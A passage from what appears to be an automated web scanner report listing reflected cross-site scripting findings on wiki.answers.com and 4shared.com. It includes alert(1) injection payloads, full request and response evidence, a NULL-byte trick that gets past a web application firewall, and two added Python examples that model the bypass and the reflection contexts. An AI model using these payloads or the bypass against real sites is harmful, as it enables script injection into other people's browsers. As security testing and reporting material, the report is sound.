Host: wiki.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-language: en
Content-Type: text/html; charset=utf-8
Date: Sat, 26 Feb 2011 02:28:04 GMT
X-Varnish: 519896591
Age: 0
Via: 1.1 varnish
Connection: close
Expires: Tue, 16 Jan 2001 00:00:00 GMT
Cache-Control: private, must-revalidate, s-maxage=0, max-age=0
Vary: Accept-Encoding
Content-Length: 77437


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<base href="http://wiki.answers.com/Q9dfa3"><script>alert(1)</script>e28327de2d6/FAQ/2637/x26amp" target="_top">
...[SNIP]...

1.303. http://wiki.answers.com/Q/FAQ/2637/x26amp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wiki.answers.com
Path:   /Q/FAQ/2637/x26amp

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0066e4d"><script>alert(1)</script>cdb01e18013 was submitted in the REST URL parameter 2. This input was echoed as 66e4d"><script>alert(1)</script>cdb01e18013 in the application's response. The reflecting response is a 404 error page; the browser renders it like any other HTML document, so the injection is no less exploitable than one on a 200 response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
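The mechanism behind that remediation note, as an added example written for this page (it is not scanner output and not code from the scanned site): the request bytes are percent-decoded once, then handed to a filter that treats them as a NUL-terminated C string and to one that scans the full buffer. `ctypes.c_char_p` gives real C-string semantics without loading a library, so the truncation is genuine; the block-list, the filter functions and the application model are hypothetical, and the probe strings are the ones from finding 1.303.

```python
import ctypes
from urllib.parse import unquote_to_bytes

# Probe strings taken from finding 1.303: the one the scanner sent in
# REST URL parameter 2, and the same probe without its leading %00.
PROBE_WITH_NUL = '%0066e4d"><script>alert(1)</script>cdb01e18013'
PROBE_PLAIN = '66e4d"><script>alert(1)</script>cdb01e18013'

# Hypothetical block-list; real WAF rule sets are larger, the bug is the same.
BLOCKED_TOKENS = (b"<script", b"javascript:", b"onerror=")


def decode_path_segment(segment: str) -> bytes:
    """Percent-decode one URL path segment, keeping every byte, NUL included."""
    return unquote_to_bytes(segment)


def as_seen_by_c_string_code(raw: bytes) -> bytes:
    """Read the buffer the way NUL-terminated native code does.

    ctypes.c_char_p has C string semantics: .value stops at the first 0x00
    byte, so anything after it is invisible to code that treats the
    request as a char*.
    """
    return ctypes.c_char_p(raw).value or b""


def native_filter_blocks(raw: bytes) -> bool:
    """Model of a WAF rule implemented over C strings (hypothetical)."""
    visible = as_seen_by_c_string_code(raw).lower()
    return any(token in visible for token in BLOCKED_TOKENS)


def length_aware_filter_blocks(raw: bytes) -> bool:
    """The same rule over an explicit (pointer, length) buffer: NUL is just
    one more byte, so the scan covers the whole input."""
    return any(token in raw.lower() for token in BLOCKED_TOKENS)


def application_echo(raw: bytes) -> str:
    """Model of the managed-runtime application behind the WAF (hypothetical):
    it discards the NUL and renders the remainder, which is what finding
    1.303 shows (the probe echoed without its %00)."""
    return raw.replace(b"\x00", b"").decode("utf-8", errors="replace")


def evaluate(segment: str) -> dict:
    """Run one probe through both filters and the application model."""
    raw = decode_path_segment(segment)
    return {
        "c_string_filter_blocks": native_filter_blocks(raw),
        "length_aware_filter_blocks": length_aware_filter_blocks(raw),
        "echoed_by_application": application_echo(raw),
    }


if __name__ == "__main__":
    for probe in (PROBE_PLAIN, PROBE_WITH_NUL):
        print(probe)
        for key, value in evaluate(probe).items():
            print("   ", key, "=", value)
```

Run stand-alone, the plain probe is caught by both filters, while the %00 variant passes the C-string filter, is caught by the length-aware one, and is echoed by the application with the NUL removed. The fix belongs in the application's output encoding; a WAF that compares (pointer, length) buffers instead of C strings closes only the bypass, not the vulnerability.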

Request

GET /Q/FAQ%0066e4d"><script>alert(1)</script>cdb01e18013/2637/x26amp HTTP/1.1
Host: wiki.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-language: en
Content-Type: text/html; charset=utf-8
Date: Sat, 26 Feb 2011 02:28:14 GMT
X-Varnish: 1622865284
Age: 0
Via: 1.1 varnish
Connection: close
Expires: Tue, 16 Jan 2001 00:00:00 GMT
Cache-Control: private, must-revalidate, s-maxage=0, max-age=0
Vary: Accept-Encoding
Content-Length: 41578

           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com
...[SNIP]...
<link rel="canonical" href="http://wiki.answers.com/Q/FAQ%0066e4d"><script>alert(1)</script>cdb01e18013/2637/x26amp" />
...[SNIP]...

1.304. http://wiki.answers.com/Q/FAQ/2637/x26amp [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wiki.answers.com
Path:   /Q/FAQ/2637/x26amp

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2586e"%3balert(1)//1842f1efae8 was submitted in the REST URL parameter 3. This input was echoed as 2586e";alert(1)//1842f1efae8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
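Findings 1.301 through 1.304 show the two reflection contexts that recur through this report: a double-quoted attribute value (`<base href>`, `<link rel="canonical">`) and a double-quoted string literal inside an inline script (`showAdmeldAd(...)`). The three facts each issue detail states, where the echo lands, what it looks like, and whether it matches what was sent, can be reproduced offline from the response body. The example below is added for this page and is not scanner code; its response bodies are constructed from the evidence lines of findings 1.303 and 1.304 plus one made-up body for plain text context, and the function names are hypothetical.

```python
from typing import Optional

# Response excerpts constructed from the evidence lines of findings 1.303
# (reflection inside a double-quoted attribute) and 1.304 (reflection inside
# a double-quoted JavaScript string).  BODY_TEXT is made up for this example.
BODY_1303 = (
    '<!DOCTYPE html>\n<html><head>\n'
    '<link rel="canonical" href="http://wiki.answers.com/Q/FAQ%0066e4d">'
    '<script>alert(1)</script>cdb01e18013/2637/x26amp" />\n'
    '</head></html>'
)
BODY_1304 = (
    '<html><head>\n<script type="text/javascript">\n'
    'numAdsFromAdmeld =0;\n'
    'jQuery(window).load(function (){\n'
    '    showAdmeldAd("dart_160x600","wikianswers","160x600","atf",'
    '"_26372586e";alert(1)//1842f1efae8/x26amp",admeld_site);\n'
    '});\n</script>\n</head></html>'
)
BODY_TEXT = '<html><body><p>No results for 4f3a1"><b>x</b>9c0d2</p></body></html>'

# What the scanner actually sent in those two findings (from the report).
SENT_1303 = '%0066e4d"><script>alert(1)</script>cdb01e18013'
SENT_1304 = '2586e"%3balert(1)//1842f1efae8'


def _inside_js_string(js: str) -> bool:
    """Scan JavaScript source and report whether it ends inside a string
    literal.  Handles backslash escapes and // and /* */ comments; regex
    literals are not modelled, which is enough for inline data sinks."""
    quote = None
    i = 0
    while i < len(js):
        c = js[i]
        if quote:
            if c == "\\":
                i += 1                      # skip the escaped character
            elif c == quote:
                quote = None
        elif c in "\"'`":
            quote = c
        elif js.startswith("//", i):
            nl = js.find("\n", i)
            if nl < 0:
                return False
            i = nl
        elif js.startswith("/*", i):
            end = js.find("*/", i + 2)
            if end < 0:
                return False
            i = end + 1
        i += 1
    return quote is not None


def reflection_context(body: str, marker: str) -> str:
    """Classify where the first occurrence of marker lands in the response."""
    pos = body.find(marker)
    if pos < 0:
        return "not_reflected"
    before = body[:pos]
    lower = before.lower()
    open_tag = lower.rfind("<script")
    if open_tag >= 0 and lower.find("</script", open_tag) < 0:
        js_start = before.find(">", open_tag) + 1
        return "js_string" if _inside_js_string(before[js_start:]) else "js_code"
    lt, gt = before.rfind("<"), before.rfind(">")
    if lt > gt:                             # still inside a tag
        tag = before[lt:]
        if tag.count('"') % 2:
            return "attribute_double_quoted"
        if tag.count("'") % 2:
            return "attribute_single_quoted"
        return "tag_unquoted"
    return "html_text"


def echoed_payload(body: str, prefix: str, suffix: str) -> Optional[str]:
    """Return the echo as it appears between the scanner's random prefix and
    suffix, or None if either is missing."""
    start = body.find(prefix)
    end = body.find(suffix, start) if start >= 0 else -1
    if start < 0 or end < 0:
        return None
    return body[start:end + len(suffix)]


def analyse(body: str, prefix: str, suffix: str, sent: str) -> dict:
    """Combine both checks into the three facts each issue detail reports."""
    echoed = echoed_payload(body, prefix, suffix)
    return {
        "context": reflection_context(body, prefix),
        "echoed_as": echoed,
        "echoed_unmodified": echoed == sent,
    }


if __name__ == "__main__":
    print(analyse(BODY_1303, "66e4d", "cdb01e18013", SENT_1303))
    print(analyse(BODY_1304, "2586e", "1842f1efae8", SENT_1304))
    print(analyse(BODY_TEXT, "4f3a1", "9c0d2", '4f3a1"><b>x</b>9c0d2'))
```

The random prefix and suffix are what make this reliable: searching for the prefix alone locates the echo even when the middle has been transformed (the `%3b` of finding 1.304 comes back as `;`, the `%00` of 1.303 is dropped), and the context decision is taken from the bytes before the echo rather than from the payload itself.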

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Q/FAQ/26372586e"%3balert(1)//1842f1efae8/x26amp HTTP/1.1
Host: wiki.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-language: en
Content-Type: text/html; charset=utf-8
Date: Sat, 26 Feb 2011 02:28:32 GMT
X-Varnish: 519900736
Age: 0
Via: 1.1 varnish
Connection: close
Expires: Tue, 16 Jan 2001 00:00:00 GMT
Cache-Control: private, must-revalidate, s-maxage=0, max-age=0
Vary: Accept-Encoding
Content-Length: 52028


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<script type="text/javascript">
numAdsFromAdmeld =0;
jQuery(window).load(function (){
       showAdmeldAd("dart_160x600","wikianswers","160x600","atf","_26372586e";alert(1)//1842f1efae8/x26amp",admeld_site);numAdsFromAdmeld++;    
    if(numAdsFromAdmeld>
...[SNIP]...

1.305. http://wiki.answers.com/Q/FAQ/2637/x26amp [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wiki.answers.com
Path:   /Q/FAQ/2637/x26amp

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae049"><script>alert(1)</script>ee6b216fa7b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Q/FAQ/2637ae049"><script>alert(1)</script>ee6b216fa7b/x26amp HTTP/1.1
Host: wiki.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-language: en
Content-Type: text/html; charset=utf-8
Date: Sat, 26 Feb 2011 02:28:31 GMT
X-Varnish: 1622867720
Age: 0
Via: 1.1 varnish
Connection: close
Expires: Tue, 16 Jan 2001 00:00:00 GMT
Cache-Control: private, must-revalidate, s-maxage=0, max-age=0
Vary: Accept-Encoding
Content-Length: 151300


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<link rel="canonical" href="http://wiki.answers.com/Q/FAQ/2637ae049"><script>alert(1)</script>ee6b216fa7b/x26amp" />
...[SNIP]...

1.306. http://wiki.answers.com/Q/FAQ/2637/x26amp [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wiki.answers.com
Path:   /Q/FAQ/2637/x26amp

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb30d"><script>alert(1)</script>8795961619a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Q/FAQ/2637/x26ampfb30d"><script>alert(1)</script>8795961619a HTTP/1.1
Host: wiki.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-language: en
Content-Type: text/html; charset=utf-8
Date: Sat, 26 Feb 2011 02:28:35 GMT
X-Varnish: 1622868195
Age: 0
Via: 1.1 varnish
Connection: close
Expires: Tue, 16 Jan 2001 00:00:00 GMT
Cache-Control: private, must-revalidate, s-maxage=0, max-age=0
Vary: Accept-Encoding
Content-Length: 151300


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<link rel="canonical" href="http://wiki.answers.com/Q/FAQ/2637/x26ampfb30d"><script>alert(1)</script>8795961619a" />
...[SNIP]...

1.307. http://wiki.answers.com/Q/FAQ/2637/x26amp [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wiki.answers.com
Path:   /Q/FAQ/2637/x26amp

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22050"%3balert(1)//7394ecf9e68 was submitted in the REST URL parameter 4. This input was echoed as 22050";alert(1)//7394ecf9e68 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Q/FAQ/2637/x26amp22050"%3balert(1)//7394ecf9e68 HTTP/1.1
Host: wiki.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-language: en
Content-Type: text/html; charset=utf-8
Date: Sat, 26 Feb 2011 02:28:36 GMT
X-Varnish: 1622868509
Age: 0
Via: 1.1 varnish
Connection: close
Expires: Tue, 16 Jan 2001 00:00:00 GMT
Cache-Control: private, must-revalidate, s-maxage=0, max-age=0
Vary: Accept-Encoding
Content-Length: 151159


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<script type="text/javascript">
numAdsFromAdmeld =0;
jQuery(window).load(function (){
       showAdmeldAd("dart_160x600","ent/music","160x600","atf","_2637/x26amp22050";alert(1)//7394ecf9e68",admeld_site);numAdsFromAdmeld++;    
    if(numAdsFromAdmeld>
...[SNIP]...

1.308. http://wiki.answers.com/Q/FAQ/2637/x26amp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wiki.answers.com
Path:   /Q/FAQ/2637/x26amp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f04ca"><script>alert(1)</script>1e97e1450d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Q/FAQ/2637/x26amp?f04ca"><script>alert(1)</script>1e97e1450d6=1 HTTP/1.1
Host: wiki.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: PHPSESSID=a5sui7s5guog0npukb22o6fja3; path=/; domain=.answers.com
Set-Cookie: a5sui7s5guog0npukb22o6fja3=n%3A0%3A%7B%7D; path=/; domain=.answers.com
Content-language: en
Content-Type: text/html; charset=utf-8
Date: Sat, 26 Feb 2011 02:27:51 GMT
X-Varnish: 519894247
Age: 0
Via: 1.1 varnish
Connection: close
Expires: Tue, 16 Jan 2001 00:00:00 GMT
Cache-Control: private, must-revalidate, s-maxage=0, max-age=0
Vary: Accept-Encoding
Content-Length: 151015


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<base href="http://wiki.answers.com/Q/FAQ/2637/x26amp?f04ca"><script>alert(1)</script>1e97e1450d6=1" target="_top">
...[SNIP]...

1.309. http://www.4shared.com/advertise/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /advertise/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload adf8c"-alert(1)-"fa2cfce21c6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response. Note that the same value is HTML-entity-encoded (&quot;) where it is reflected in the HTTP status line, but is written raw into the inline script block; output encoding applied at one sink does not protect a different sink in the same response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advertiseadf8c"-alert(1)-"fa2cfce21c6/ HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /advertiseadf8c&quot;-alert(1)-&quot;fa2cfce21c6/
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D569F2525929105DF9E4B5CBCB35FEB6.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:43 GMT
Connection: close
Content-Length: 36113


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/advertiseadf8c"-alert(1)-"fa2cfce21c6/";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var win
...[SNIP]...

1.310. http://www.4shared.com/advertise/banners/desktop/300x250.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /advertise/banners/desktop/300x250.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cbe69"-alert(1)-"855c7c91d82 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advertisecbe69"-alert(1)-"855c7c91d82/banners/desktop/300x250.jsp HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://static.4shared.com/css/indexm.css6ce34'-alert(1)-'2fc82178551?ver=1610
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; search.view2=ls; JSESSIONID=3CFB65BE110C065A39C53A13723EF882.dc278

Response

HTTP/1.1 404 /advertisecbe69&quot;-alert(1)-&quot;855c7c91d82/banners/desktop/300x250.jsp
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 14:32:20 GMT
Content-Length: 36336


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://static.4shared.com/c
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/advertisecbe69"-alert(1)-"855c7c91d82/banners/desktop/300x250.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function
...[SNIP]...

1.311. http://www.4shared.com/advertise/banners/desktop/300x250.jsp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /advertise/banners/desktop/300x250.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bdfe3"-alert(1)-"24e87bceef2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advertise/bannersbdfe3"-alert(1)-"24e87bceef2/desktop/300x250.jsp HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://static.4shared.com/css/indexm.css6ce34'-alert(1)-'2fc82178551?ver=1610
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; search.view2=ls; JSESSIONID=3CFB65BE110C065A39C53A13723EF882.dc278

Response

HTTP/1.1 404 /advertise/bannersbdfe3&quot;-alert(1)-&quot;24e87bceef2/desktop/300x250.jsp
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 14:32:36 GMT
Content-Length: 36336


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://static.4shared.com/c
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/advertise/bannersbdfe3"-alert(1)-"24e87bceef2/desktop/300x250.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedbac
...[SNIP]...

1.312. http://www.4shared.com/advertise/banners/desktop/300x250.jsp [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /advertise/banners/desktop/300x250.jsp

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e2c5"-alert(1)-"4c8ee2c4559 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advertise/banners/desktop2e2c5"-alert(1)-"4c8ee2c4559/300x250.jsp HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://static.4shared.com/css/indexm.css6ce34'-alert(1)-'2fc82178551?ver=1610
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; search.view2=ls; JSESSIONID=3CFB65BE110C065A39C53A13723EF882.dc278

Response

HTTP/1.1 404 /advertise/banners/desktop2e2c5&quot;-alert(1)-&quot;4c8ee2c4559/300x250.jsp
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 14:32:50 GMT
Content-Length: 36336


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://static.4shared.com/c
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/advertise/banners/desktop2e2c5"-alert(1)-"4c8ee2c4559/300x250.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.313. http://www.4shared.com/advertise/banners/desktop/300x250.jsp [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /advertise/banners/desktop/300x250.jsp

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24af2"-alert(1)-"972becc4068 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advertise/banners/desktop/300x250.jsp24af2"-alert(1)-"972becc4068 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://static.4shared.com/css/indexm.css6ce34'-alert(1)-'2fc82178551?ver=1610
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; search.view2=ls; JSESSIONID=3CFB65BE110C065A39C53A13723EF882.dc278

Response

HTTP/1.1 404 /advertise/banners/desktop/300x250.jsp24af2&quot;-alert(1)-&quot;972becc4068
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 14:33:03 GMT
Content-Length: 36336


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://static.4shared.com/c
...[SNIP]...
